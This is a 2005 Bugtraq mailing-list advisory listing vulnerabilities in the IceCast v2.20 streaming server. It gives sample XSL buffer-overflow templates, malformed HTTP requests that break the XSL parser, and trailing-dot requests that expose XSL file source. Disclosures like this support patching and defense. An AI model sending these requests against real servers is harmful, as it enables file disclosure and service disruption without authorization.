IceCast up to v2.20 multiple vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: IceCast up to v2.20 multiple vulnerabilities
From: Patrick <patrickthomassen@xxxxxxxxx>
Date: 18 Mar 2005 22:31:14 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


These are tested on IceCast v2.20. This software can be freely obtained from 
http://www.icecast.org.

"Icecast is a streaming media server which currently supports Ogg 
Vorbis and MP3 audio streams. It can be used to create an Internet 
radio station or a privately running jukebox and many things in 
between. It is very versatile in that new formats can be added 
relatively easily and supports open standards for commuincation and 
interaction."

1) The XSL parser has some unchecked buffers (local), but they dont seem to be 
exploitable. If they are, they can be used for priviledge escalation, under the 
user that the server runs.

<xsl:when test="<lots of chars>"></xsl:when>
<xsl:if test="<lots of chars>"></xsl:if>
<xsl:value-of select="<lots of chars>" />

2) Cause XSL parser error "Could not parse XSLT file". (Not very useful).

GET /status.xsl> HTTP/1.0
GET /status.xsl< HTTP/1.0
GET /<status.xsl HTTP/1.0

3) XSL parser bypass. (Useful to steal customized XSL files, lol).

GET /auth.xsl. HTTP/1.0
GET /status.xsl. HTTP/1.0

Prev by Date: Re: SAV9 Functionality Hole - misses virus files
Next by Date: RE: [phpbb <= 2.0.13 full path disclosure & directory listing]
Previous by thread: RE: [phpbb <= 2.0.13 full path disclosure & directory listing]
Next by thread: [ GLSA 200503-22 ] KDE: Local Denial of Service
Index(es):
- Date
- Thread